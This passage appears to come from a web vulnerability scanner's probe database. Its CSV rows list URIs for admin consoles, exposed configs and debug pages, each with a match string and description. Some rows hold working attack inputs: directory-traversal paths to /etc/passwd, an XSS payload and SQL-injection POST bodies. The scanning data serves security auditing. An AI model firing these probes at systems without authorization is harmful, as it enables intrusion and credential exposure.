found.\",\"\",\"\"\n\"006356\",\"0\",\"1\",\"/navSiteAdmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006357\",\"0\",\"1\",\"/newsadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006358\",\"0\",\"1\",\"/openvpnadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006359\",\"0\",\"1\",\"/painel/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006360\",\"0\",\"1\",\"/panel/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006361\",\"0\",\"1\",\"/pgadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006362\",\"0\",\"1\",\"/phpldapadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006363\",\"0\",\"1\",\"/phppgadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006364\",\"0\",\"1\",\"/phpSQLiteAdmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006365\",\"0\",\"1\",\"/platz_login/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006366\",\"0\",\"1\",\"/power_user/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006367\",\"0\",\"1\",\"/project-admins/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006368\",\"0\",\"1\",\"/pureadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006369\",\"0\",\"1\",\"/radmind-1/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006370\",\"0\",\"1\",\"/radmind/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006371\",\"0\",\"1\",\"/rcLogin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006372\",\"0\",\"1\",\"/server_admin_small/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006373\",\"0\",\"1\",\"/Server.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006374\",\"0\",\"1\",\"/Server.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006375\",\"0\",\"1\",\"/Server.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006376\",\"0\",\"1\",\"/ServerAdministrator/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006377\",\"0\",\"1\",\"/showlogin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006378\",\"0\",\"1\",\"/simpleLogin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006379\",\"0\",\"1\",\"/smblogin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006380\",\"0\",\"1\",\"/sql-admin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006381\",\"0\",\"1\",\"/ss_vms_admin_sm/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006382\",\"0\",\"1\",\"/sshadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006383\",\"0\",\"1\",\"/staradmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006384\",\"0\",\"1\",\"/sub-login/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006385\",\"0\",\"1\",\"/Super-Admin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006386\",\"0\",\"1\",\"/support_login/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006387\",\"0\",\"1\",\"/sys-admin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006388\",\"0\",\"1\",\"/sysadmin.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006389\",\"0\",\"1\",\"/sysadmin.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006390\",\"0\",\"1\",\"/sysadmin.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006391\",\"0\",\"1\",\"/sysadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006392\",\"0\",\"1\",\"/SysAdmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006393\",\"0\",\"1\",\"/SysAdmin2/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006394\",\"0\",\"1\",\"/sysadmins/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006395\",\"0\",\"1\",\"/system_administration/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006396\",\"0\",\"1\",\"/system-administration/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006398\",\"0\",\"1\",\"/ur-admin.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006399\",\"0\",\"1\",\"/ur-admin.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006400\",\"0\",\"1\",\"/ur-admin.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006401\",\"0\",\"1\",\"/ur-admin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006402\",\"0\",\"1\",\"/useradmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006403\",\"0\",\"1\",\"/UserLogin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006404\",\"0\",\"1\",\"/utility_login/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006405\",\"0\",\"1\",\"/v2/painel/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006406\",\"0\",\"1\",\"/vadmind/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006407\",\"0\",\"1\",\"/vmailadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006408\",\"0\",\"1\",\"/webadmin.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006409\",\"0\",\"1\",\"/webadmin.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006410\",\"0\",\"1\",\"/webadmin.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006411\",\"0\",\"1\",\"/webmaster/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006412\",\"0\",\"1\",\"/websvn/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006413\",\"0\",\"1\",\"/wizmysqladmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006414\",\"0\",\"1\",\"@WORDPRESSwp-admin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006415\",\"0\",\"1\",\"@WORDPRESSwp-login/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006416\",\"0\",\"1\",\"/xlogin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006417\",\"0\",\"1\",\"/yonetici.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006418\",\"0\",\"1\",\"/yonetici.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006419\",\"0\",\"1\",\"/yonetici.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006420\",\"0\",\"1\",\"/yonetim.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006421\",\"0\",\"1\",\"/yonetim.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006422\",\"0\",\"1\",\"/yonetim.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006423\",\"3092\",\"1\",\"/test.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006424\",\"3092\",\"1\",\"/test.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006425\",\"3092\",\"1\",\"/test.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006426\",\"0\",\"1\",\"/maintenance.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006427\",\"0\",\"1\",\"/maintenance.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006429\",\"0\",\"1\",\"/maint/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006430\",\"0\",\"1\",\"/maint.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006431\",\"0\",\"1\",\"/maint.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006432\",\"59440\",\"57\",\"/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"VMWare ESX is vulnerable to a directory traversal attack.\",\"\",\"\"\n\"006433\",\"39003\",\"4\",\"/\",\"<script>alert(1)</script>\",\"413\",\"\",\"<script>alert\\(1\\)<\\/script>\",\"\",\"\",\"Apache HTTP Server 2.0.x and 2.2.x contain an XSS when JavaScript is used as the method\",\"\",\"Content-Length: -1\"\n\"006434\",\"0\",\"3\",\"/jk-status\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"mod_jk status page is visible.\",\"\",\"\"\n\"006435\",\"0\",\"3\",\"/balancer-manager\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"mod_proxy_balancer management page is visible.\",\"\",\"\"\n\"006437\",\"0\",\"1\",\"/servlets-examples/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Tomcat servlets examples are visible.\",\"\",\"\"\n\"006438\",\"0\",\"1e\",\"/admin-console\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"JBoss admin console is visible.\",\"\",\"\"\n\"006439\",\"0\",\"13\",\"/webmail/src/configtest.php\",\"GET\",\"SquirrelMail configtest\",\"\",\"\",\"\",\"\",\"Squirrelmail configuration test may reveal version and system info.\",\"\",\"\"\n\"006440\",\"0\",\"23\",\"@CGIDIRSawstats.pl\",\"GET\",\"SiteDomain parameter\",\"\",\"\",\"\",\"\",\"AWStats logfile analyzer is misconfigured.\",\"\",\"\"\n\"006441\",\"0\",\"2\",\"@CGIDIRSawredir.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"AWStats redirection file.\",\"\",\"\"\n\"006442\",\"0\",\"1\",\"/help.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"A help file was found.\",\"\",\"\"\n\"006443\",\"0\",\"b\",\"@WORDPRESS\",\"GET\",\"\\/wp-content\\/\",\"\",\"\",\"\",\"\",\"A Wordpress installation was found.\",\"\",\"\"\n\"006445\",\"66505\",\"3\",\"@VBULLETINfaq.php?s=&do=search&q=database&match=all&titlesonly=0\",\"GET\",\"Database<\\/span> Name:\",\"\",\"\",\"\",\"\",\"vBulletin 3.6.8 contains a vulnerability that reveals the database credentials via a FAQ search. See http://www.vbulletin.com/forum/showthread.php?357818-Security-Patch-Release-3.8.6-PL1\",\"\",\"\"\n\"006447\",\"0\",\"2b\",\"/wconnect/admin.html\",\"GET\",\"e-SPS Web\",\"\",\"\",\"\",\"\",\"American Software e-SPS admin section found.\",\"\",\"\"\n\"006448\",\"0\",\"18\",\"/open.txt\",\"GET\",\"Fx29ID\",\"\",\"\",\"\",\"\",\"Payload for Fx29ID RFI exploit. The server may have been compromised to act as a repository for this file.\",\"\",\"\"\n\"006449\",\"0\",\"18\",\"/fx29id1.txt\",\"GET\",\"Fx29ID\",\"\",\"\",\"\",\"\",\"Payload for Fx29ID RFI exploit. The server may have been compromised to act as a repository for this file.\",\"\",\"\"\n\"006450\",\"0\",\"18\",\"/fx29id2.txt\",\"GET\",\"Fx29ID\",\"\",\"\",\"\",\"\",\"Payload for Fx29ID RFI exploit. The server may have been compromised to act as a repository for this file.\",\"\",\"\"\n\"006451\",\"0\",\"b\",\"/gif/hp_invent_logo.gif\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This device may be an HP printer/scanner and allow retrieval of previously scanned images.\",\"\",\"\"\n\"006452\",\"0\",\"b\",\"/gif/tricolor_ink_guage.gif\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This device may be an HP printer/scanner and allow retrieval of previously scanned images.\",\"\",\"\"\n\"006453\",\"0\",\"b1\",\"/logon/logonServlet\",\"GET\",\"User Management\",\"\",\"\",\"\",\"\",\"SAP NetWeaver admin interface found.\",\"\",\"\"\n\"006454\",\"0\",\"3\",\"/AdobeDocumentServicesSec/Config/bindings?wsdl&style=http\",\"GET\",\"><b>\\&nbsp;\\&nbspThe file:\",\"\",\"does not exist\",\"\",\"\",\"SAP J2EE server reveals the disk path with certain invalid requests.\",\"\",\"\"\n\"006455\",\"0\",\"23\",\"@AXIS2services\",\"GET\",\"And now\\.\\.\\.\\sSome\\sServices\",\"\",\"\",\"\",\"\",\"Apache Axis web services reveals information about all installed web services. See http://ws.apache.org/axis/java/security.html to secure Axis.\",\"\",\"\"\n\"006456\",\"0\",\"23\",\"@AXIS2happyaxis.jsp\",\"GET\",\"Examining\\swebapp\\sconfiguration\",\"<title>Axis\\sHappiness\\sPage<\\/title>\",\"\",\"\",\"\",\"Apache Axis file reveals sensitive information about the Axis installation components. See http://ws.apache.org/axis/java/security.html to secure Axis.\",\"\",\"\"\n\"006457\",\"0\",\"2\",\"/apidocs/index.html\",\"GET\",\"designed to be viewed using the frames\",\"\",\"\",\"\",\"\",\"SAP J2EE Engine help.\",\"\",\"\"\n\"006821\",\"0\",\"2\",\"/bcb/bcbadmSystemInfo.jsp\",\"GET\",\"SAP SOAP URL:\",\"\",\"\",\"\",\"\",\"SAP Business Communication Broker (bcb) may reveal system information.\",\"\",\"\"\n\"006458\",\"0\",\"2\",\"/bcb/bcbadmStart.jsp\",\"GET\",\"BCB-Administration\",\"\",\"\",\"\",\"\",\"SAP Business Communication Broker (bcb) may reveal system information and allow configuration.\",\"\",\"\"\n\"006459\",\"0\",\"23\",\"/GRMGHeartBeat/HTTPGRMGTest.html\",\"GET\",\"This is test page for GRMG\",\"\",\"\",\"\",\"\",\"SAP GRMG test page.\",\"\",\"\"\n\"006460\",\"0\",\"23\",\"/meSync/HttpGRMGTest.html\",\"GET\",\"This is test page for GRMG\",\"\",\"\",\"\",\"\",\"SAP GRMG test page.\",\"\",\"\"\n\"006461\",\"0\",\"23\",\"/htmlb/index.html\",\"GET\",\"HTMLB for Java\",\"\",\"\",\"\",\"\",\"SAP HTMLB pages.\",\"\",\"\"\n\"006462\",\"0\",\"23\",\"/SQLTrace/index.html\",\"GET\",\"Welcome to SQLTrace\",\"\",\"\",\"\",\"\",\"SAP SQLTrace may disclose sensitive information.\",\"\",\"\"\n\"006463\",\"0\",\"23\",\"/TestJDBC_Web/TestJDBCPage.jsp\",\"GET\",\"Please select a connection\",\"\",\"\",\"\",\"\",\"SAP Test JDBC Page may allow unauthorized access to resources or provide detailed errors.\",\"\",\"\"\n\"006464\",\"0\",\"23\",\"/uddiclient/jsps/index.jsp\",\"GET\",\"HTML Business for Java\",\"\",\"\",\"\",\"\",\"SAP UDDI Tool is available remotely.\",\"\",\"\"\n\"006465\",\"0\",\"b12\",\"/~/index.html\",\"GET\",\"SAP NetWeaver\",\"\",\"\",\"\",\"\",\"SAP NetWeaver default page links to other admin areas.\",\"\",\"\"\n\"006466\",\"0\",\"b12\",\"/webdynpro/welcome/Welcome.jsp\",\"GET\",\"Web Dynpro Welcome\",\"\",\"\",\"\",\"\",\"SAP NetWeaver Web Dynpro Tool Applications.\",\"\",\"\"\n\"006467\",\"0\",\"b\",\"/sites/\",\"GET\",\"Plone are now up and running\",\"\",\"\",\"\",\"\",\"Zope/Plone were found. Try adding a new site!.\",\"\",\"\"\n\"006468\",\"3093\",\"0\",\"@FCKEDITOReditor/filemanager/browser/default/frmupload.html\",\"GET\",\"Upload a new file\",\"\",\"\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006469\",\"3093\",\"23\",\"@FCKEDITORlicense.txt\",\"GET\",\"Frederico\",\"\",\"\",\"\",\"\",\"FCKeditor license file found.\",\"\",\"\"\n\"006470\",\"3093\",\"1\",\"@FCKEDITORfckconfig.js\",\"GET\",\"FCKConfig\",\"\",\"\",\"\",\"\",\"FCKeditor JavaScript file found.\",\"\",\"\"\n\"006471\",\"3093\",\"23\",\"@FCKEDITOR_whatsnew.html\",\"GET\",\"CreateFCKeditor\",\"FCKeditor\\sChangeLog\",\"\",\"\",\"\",\"FCKeditor changes file found.\",\"\",\"\"\n\"006472\",\"3093\",\"0\",\"@FCKEDITOReditor/filemanager/browser/default/browser.html\",\"GET\",\"Resources Browser\",\"\",\"\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006473\",\"0\",\"1b\",\"/reportserver/\",\"GET\",\"Microsoft SQL Server Reporting Services\",\"\",\"\",\"\",\"\",\"Microsoft SQL Server Reporting Services\",\"\",\"\"\n\"006474\",\"0\",\"2\",\"/j2ee/examples/servlets/\",\"GET\",\"This is a collection\",\"\",\"\",\"\",\"\",\"Oracle j2ee example servlets.\",\"\",\"\"\n\"006475\",\"0\",\"2\",\"/j2ee/examples/jsp/\",\"GET\",\"This is a collection\",\"\",\"\",\"\",\"\",\"Oracle j2ee example JSP pages.\",\"\",\"\"\n\"006476\",\"3092\",\"1\",\"/messages/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006477\",\"0\",\"23\",\"@CRYSTALREPORTSviewrpt.cwr?id=1&wid=1&apstoken=127.0.0.2:0@111\",\"GET\",\"Server 127\\.0\\.0\\.2:0 not found\",\"\",\"\",\"\",\"\",\"Crystal Reports can be used to scan internal hosts. See http://tinyurl.com/2f4r2o9\",\"\",\"\"\n\"006478\",\"0\",\"be\",\"/console-selfservice/\",\"GET\",\"console header\",\"\",\"\",\"\",\"\",\"RSA Self-Service Console found\",\"\",\"\"\n\"006479\",\"0\",\"3\",\"@AXIS2axis2-web/HappyAxis.jsp\",\"GET\",\"Axis2\\sHappiness\\sPage\",\"Back\\sHome\",\"\",\"\",\"\",\"Apache Axis2 Happiness Page identified which includes internal application details.\",\"\",\"\"\n\"006480\",\"0\",\"9\",\"/search.php\",\"POST\",\"MyBB has experienced an internal SQL error and cannot continue\\.\",\"\",\"\",\"Sorry, but no results were returned\",\"\",\"MyBB 1.6 contains an SQL Injection in the keywords parameter of search.php.  See http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection\",\"action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1\",\"\"\n\"006481\",\"0\",\"9\",\"/private.php\",\"POST\",\"MyBB has experienced an internal SQL error and cannot continue\\.\",\"\",\"\",\"Sorry, but no results were returned\",\"\",\"MyBBx 1.6 contains an SQL Injection in the keywords parameter of private.php. See http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection\",\"my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff\",\"\"\n\"006482\",\"0\",\"3\",\"/en-GB/debug/sso\",\"GET\",\"SSO Enabled\",\"\",\"\",\"\",\"\",\"Splunk's SSO debug may reveal sensitive info, such as internal IPs/hostnames.\",\"\",\"\"\n\"006483\",\"0\",\"3\",\"/en-US/debug/sso\",\"GET\",\"SSO Enabled\",\"\",\"\",\"\",\"\",\"Splunk's SSO debug may reveal sensitive info, such as internal IPs/hostnames.\",\"\",\"\"\n\"006484\",\"0\",\"3\",\"/default.htm\",\"GET\",\"Behind Every Great Web Site\",\"\",\"\",\"\",\"\",\"Default EPiServer file found\",\"\",\"\"\n\"006486\",\"59001\",\"7\",\"@AXIS2services/Version?xsd=../../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Apache Axis2 contains a directory traversal in the Version program.\",\"\",\"\"\n\"006487\",\"0\",\"b\",\"/Util/login.aspx\",\"GET\",\"EPiServer CMS\",\"epi\\-(login|button)\",\"\",\"\",\"\",\"EPiServer admin login page found.\",\"\",\"\"\n\"006488\",\"3092\",\"b\",\"@PHPMYADMINsetup\",\"GET\",\"index\\.php\\?phpMyAdmin=\",\"\",\"\",\"\",\"\",\"phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. The /setup/ directory may reveal details about the install application and databases.\",\"\",\"\"\n\"006489\",\"0\",\"1\",\"/jsp/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"JSP directory has indexing enabled.\",\"\",\"\"\n\"006490\",\"0\",\"be\",\"/portal/console/\",\"GET\",\"function\\sfindTopWindow\",\"\",\"\",\"\",\"\",\"Vignette Server admin console located.\",\"\",\"\"\n\"006491\",\"0\",\"2abe\",\"/network/cgi/network.cgi\",\"GET\",\"Network\\sConfiguration\",\"\",\"\",\"\",\"\",\"IndigoVision web console access found without authentication.\",\"\",\"\"\n\"006492\",\"0\",\"b\",\"/sitefinity/Login.aspx\",\"GET\",\"checkForIframe\",\"\",\"\",\"\",\"\",\"Telerik Sitefinity CMS login found.\",\"\",\"\"\n\"006493\",\"3092\",\"1\",\"/cms/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006494\",\"3092\",\"1\",\"/helpdesk/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006495\",\"0\",\"1b\",\"@PHPMYADMIN\",\"GET\",\"200\",\"401\",\"\",\"\",\"\",\"phpMyAdmin directory found\",\"\",\"\"\n\"006496\",\"0\",\"3b\",\"/admin/install/phpinfo.php\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"LimeSurvey phpinfo page found. The install directory may contain resetadminpw.php, which will set admin to the default password, likely 'password'. The install directory should be removed.\",\"\",\"\"\n\"006497\",\"0\",\"b\",\"/portal/binary/junk/\",\"GET\",\"Attempt\\smade\\s\\to\\sload\\sunavailable\\sclass\",\"\",\"\",\"\",\"\",\"Vignette Server binary loader.\",\"\",\"\"\n\"006498\",\"0\",\"bd\",\"/portal/webservice/\",\"GET\",\"And\\snow\\.\\.\\.\",\"\",\"\",\"\",\"\",\"Vignette Server webservices.\",\"\",\"\"\n\"006499\",\"0\",\"be\",\"/console/login/LoginForm.jsp\",\"GET\",\"Log\\sin\\sto\\swork\",\"\",\"\",\"\",\"\",\"Oracle WebLogic administrator login found.\",\"\",\"\"\n\"006500\",\"0\",\"b3\",\"/home/?vhelp\",\"GET\",\"Global\\sAvailable\\sMacros\",\"\",\"\",\"\",\"\",\"Intuit (diginsite.com) debug mode enabled.\",\"\",\"\"\n\"006501\",\"0\",\"b\",\"/servlet/snoopservlet\",\"GET\",\"Hit Count Demonstration\",\"\",\"\",\"\",\"\",\"IBM Websphere SnoopDog example servlet found\",\"\",\"\"\n\"006502\",\"0\",\"b\",\"/servlet/hitcount\",\"GET\",\"Snoop Servlet - Request\\/Client Information\",\"\",\"\",\"\",\"\",\"IBM Websphere Hit Count example servlet found\",\"\",\"\"\n\"006503\",\"0\",\"b\",\"/keepalive.htm\",\"GET\",\"200\",\"\",\"Alive!\",\"\",\"\",\"Weblogic heartbeat page found\",\"\",\"\"\n\"006504\",\"0\",\"1b\",\"/Admin/\",\"GET\",\"200\",\"\",\"Administration Homepage\",\"\",\"\",\"Weblogic administration page found\",\"\",\"\"\n\"006505\",\"0\",\"23\",\"@AXIS2services/\",\"GET\",\"have\\sreached\\sthe\\sAXIS\\sHTTP\\sServlet\",\"\",\"\",\"\",\"\",\"Apache Axis web services found\",\"\",\"\"\n\"006506\",\"3092\",\"3\",\"/web.config.bak\",\"GET\",\"<configuration>\",\"\",\"200\",\"\",\"\",\"ASP config backup file is accessible.\",\"\",\"\"\n\"006507\",\"3092\",\"3\",\"/web.config.back\",\"GET\",\"<configuration>\",\"\",\"200\",\"\",\"\",\"ASP config backup file is accessible.\",\"\",\"\"\n\"006508\",\"3092\",\"3\",\"/web.config.backup\",\"GET\",\"<configuration>\",\"\",\"200\",\"\",\"\",\"ASP config backup file is accessible.\",\"\",\"\"\n\"006509\",\"3092\",\"3\",\"/web.config.old\",\"GET\",\"<configuration>\",\"\",\"200\",\"\",\"\",\"ASP config backup file is accessible.\",\"\",\"\"\n\"006510\",\"3092\",\"3\",\"/web.config.orig\",\"GET\",\"<configuration>\",\"\",\"200\",\"\",\"\",\"ASP config backup file is accessible.\",\"\",\"\"\n\"006511\",\"3092\",\"3\",\"/web.config~\",\"GET\",\"<configuration>\",\"\",\"200\",\"\",\"\",\"ASP config backup file is accessible.\",\"\",\"\"\n\"006512\",\"3092\",\"3\",\"/.web.config.swp\",\"GET\",\"<configuration>\",\"\",\"200\",\"\",\"\",\"ASP config backup file is accessible.\",\"\",\"\"\n\"006513\",\"0\",\"1\",\"/nn.asp\",\"GET\",\"File\\sName\",\"\",\"200\",\"\",\"\",\"Directory listing program found\",\"\",\"\"\n\"006514\",\"0\",\"b3\",\"/munin/index.html\",\"GET\",\"generated\\sby\\s.*munin\",\"\",\"200\",\"\",\"\",\"Munin reveals system information.\",\"\",\"\"\n\"006515\",\"0\",\"123\",\"/includes/conexion.inc\",\"GET\",\"Provider=\",\"DRIVER=\",\"200\",\"\",\"\",\"Database connection file found.\",\"\",\"\"\n\"006516\",\"0\",\"3b\",\"/errorpage.aspx\",\"GET\",\"DotNetNuke\\sError:\\s-\\sVersion\",\"\",\"\",\"\",\"\",\"DotNetNuke reveals the version number in the error page.\",\"\",\"\"\n\"006517\",\"0\",\"b\",\"/spin/main.csp\",\"GET\",\"200\",\"iTechnology SPIN\",\"\",\"\",\"\",\"CA iTechnology SPIN interface found\",\"\",\"\"\n\"006518\",\"0\",\"b\",\"/openadmin/\",\"GET\",\"200\",\"OpenAdmin Tool\",\"\",\"\",\"\",\"Informix OpenAdmin tool administration login\",\"\",\"\"\n\"006519\",\"0\",\"b\",\"@WORDPRESSwp-admin/wp-login.php?action=register\",\"GET\",\"Register\\sFor\\sThis\\sSite\",\"\",\"\",\"registration\\sis\\scurrently\\snot\",\"\",\"Wordpress registration enabled\",\"\",\"\"\n\"006520\",\"0\",\"b\",\"@WORDPRESSwp-login.php?action=register\",\"GET\",\"Register\\sFor\\sThis\\sSite\",\"\",\"\",\"registration\\sis\\scurrently\\snot\",\"\",\"Wordpress registration enabled\",\"\",\"\"\n\"006521\",\"0\",\"7\",\"/../../windows/dvr2.ini\",\"GET\",\"\\[generic\\]\",\"\",\"\",\"\",\"\",\"Tibetsystem DVR allows arbitrary file retrieval. See http://packetstormsecurity.org/files/109547/tibetsystem-traversal.txt\",\"\",\"\"\n\"006522\",\"18255\",\"7\",\"/htdocs/../../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"SAP Internet Graphics Server (IGS) directory 